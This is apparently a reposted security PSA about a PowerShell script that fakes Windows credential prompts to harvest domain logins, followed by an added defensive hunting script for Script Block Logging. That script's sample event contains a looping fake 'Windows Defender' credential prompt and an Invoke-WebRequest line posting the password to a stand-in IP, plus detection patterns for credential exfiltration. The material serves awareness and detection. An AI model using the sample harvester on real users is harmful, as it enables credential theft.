
PSA: Beware of Windows PowerShell Credential Request Prompts


steven36


A new PowerShell script was posted on Github recently that prompts a victim to enter their login credentials, checks if they are correct, and then sends the credentials to a remote server. This allows an attacker to distribute the script and harvest domain login credentials from their victims.

 

https://s7d4.turboimg.net/sp/90a06139241c8860b2855b1def53444e/github03.png

 

 

Description on Github

This Github script utilizes the Get-Credential PowerShell cmdlet to display the login prompt that asks the user to enter their credentials. When the user enters their credentials, the script will try to use them to authenticate to the victim's domain, and if successful, will send the credentials to a remote server. If the entered credentials are incorrect, the script will keep prompting the user to enter their credentials.

Cancelling the dialog does not help, since the script simply re-prompts. At this point the only way to terminate the prompt is to open Task Manager, look for a process called "Windows PowerShell", and end it.

 

https://s7d8.turboimg.net/sp/70b90c2cb77e8b2604e7e221747032eb/task-manager.png

 

Task Manager

Thankfully, the login prompt displayed by this particular script makes it easy to spot as the alert will be titled "Windows PowerShell credential request" and will contain a blue ribbon with a set of keys as shown below.

 

https://s7d3.turboimg.net/sp/03f357ea528249e59c636b52b4cae81f/default-prompt.png

Default Get-Credential prompt

 

 

The problem is that the title of this alert can be changed by using a slightly different PowerShell cmdlet, which we will not be sharing here. By using the different command, an attacker can further customize the login prompt to make it more convincing to the victim.

 

For example, below we created a prompt that pretends to be Windows Defender and asks the user to login in order to clean the computer.

 

https://s7d4.turboimg.net/sp/1e6e40b14a8a0782889614b77eeca586/customized-prompt.png

 

While experienced computer users may still find the prompt suspicious, there are many who may think it's legitimate and enter their login name and password.

 

Thankfully, even though the title may have been changed, the prompt itself still contains the blue ribbon with the set of keys in it. Therefore, if you ever see a prompt asking for your username and password and the alert looks similar to the one above, be wary about entering your credentials. It very well could be an attempt to steal your domain login.

 

Source
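Added example (not code from the original post or from the GitHub script it describes): a defender-side hunt for the pattern the article outlines, a credential prompt inside a retry loop combined with an outbound network call, run over PowerShell Script Block Logging events (Event ID 4104). The event records below are constructed samples so the script runs offline; the hostnames, record IDs, the 198.51.100.10 address and the script block text are all assumptions, not data from the page. The regex indicators are a heuristic, not a signature for any specific tool.

```powershell
# Hunt Script Block Logging (Microsoft-Windows-PowerShell/Operational, Event ID 4104)
# for the credential-harvester shape: Get-Credential / PromptForCredential called
# in a loop, plus something that sends data off the box.
# Requires Script Block Logging to be enabled on the endpoint for live use.

function Get-SampleScriptBlocks {
    # Constructed stand-ins for the ScriptBlockText of 4104 events (not real logs).
    # For live hunting replace this function with:
    #   Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } |
    #     ForEach-Object { [pscustomobject]@{ RecordId = $_.RecordId; Computer = $_.MachineName; ScriptBlockText = $_.Properties[2].Value } }
    @(
        [pscustomobject]@{
            RecordId        = 1001                 # assumed
            Computer        = 'WS01.corp.example'  # assumed
            ScriptBlockText = @'
$ok = $false
while (-not $ok) {
    $cred = Get-Credential -Message "Windows Defender needs your password to clean this computer"
    $ok = Test-SomethingAgainstDomain $cred
}
Invoke-WebRequest -Uri "http://198.51.100.10/collect" -Method Post -Body $cred.GetNetworkCredential().Password
'@
        },
        [pscustomobject]@{
            RecordId        = 1002                 # assumed
            Computer        = 'ADMIN01.corp.example'  # assumed
            ScriptBlockText = @'
$cred = Get-Credential -UserName "corp\svc_backup" -Message "Backup account"
New-PSSession -ComputerName FS01 -Credential $cred
'@
        },
        [pscustomobject]@{
            RecordId        = 1003                 # assumed
            Computer        = 'WS02.corp.example'  # assumed
            ScriptBlockText = @'
Invoke-RestMethod -Uri "https://intranet.corp.example/api/health"
'@
        }
    )
}

function Find-CredentialPromptAbuse {
    param([Parameter(Mandatory)][object[]]$Events)

    # Indicators, each a regex over the script block text.
    $promptPattern = '(?i)\bGet-Credential\b|PromptForCredential'
    $loopPattern   = '(?i)\b(do|while|for|foreach|until)\b'
    $sendPattern   = '(?i)\b(Invoke-WebRequest|Invoke-RestMethod|Send-MailMessage)\b|Net\.WebClient|Net\.Sockets\.TcpClient'
    $secretPattern = '(?i)GetNetworkCredential\(\)'

    foreach ($e in $Events) {
        $text = [string]$e.ScriptBlockText
        # A prompt on its own is ordinary admin usage; only prompts get scored at all.
        if ($text -notmatch $promptPattern) { continue }

        $hits = @('credential-prompt')
        if ($text -match $loopPattern)   { $hits += 'retry-loop' }
        if ($text -match $sendPattern)   { $hits += 'network-send' }
        if ($text -match $secretPattern) { $hits += 'plaintext-password' }

        # prompt + loop + send is the harvester shape; prompt + one extra is worth a look.
        $severity = switch ($hits.Count) {
            { $_ -ge 3 } { 'high' }
            2            { 'medium' }
            default      { 'info' }
        }

        [pscustomobject]@{
            RecordId   = $e.RecordId
            Computer   = $e.Computer
            Severity   = $severity
            Indicators = ($hits -join ', ')
        }
    }
}

# Usage: with the constructed samples, record 1001 comes back as 'high' with all four
# indicators, 1002 as 'info' (single prompt, no loop, no send), and 1003 is not listed.
Find-CredentialPromptAbuse -Events (Get-SampleScriptBlocks) | Format-Table -AutoSize
```

The indicator words are deliberately broad (the loop check will also fire on a `foreach` unrelated to the prompt), so treat a `high` result as a lead to pull the full script block from the event log rather than as a verdict. If the prompt is already on screen, the same advice as above applies: end the "Windows PowerShell" process from Task Manager (or `Stop-Process -Name powershell` from another console) rather than typing a password into it.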

 
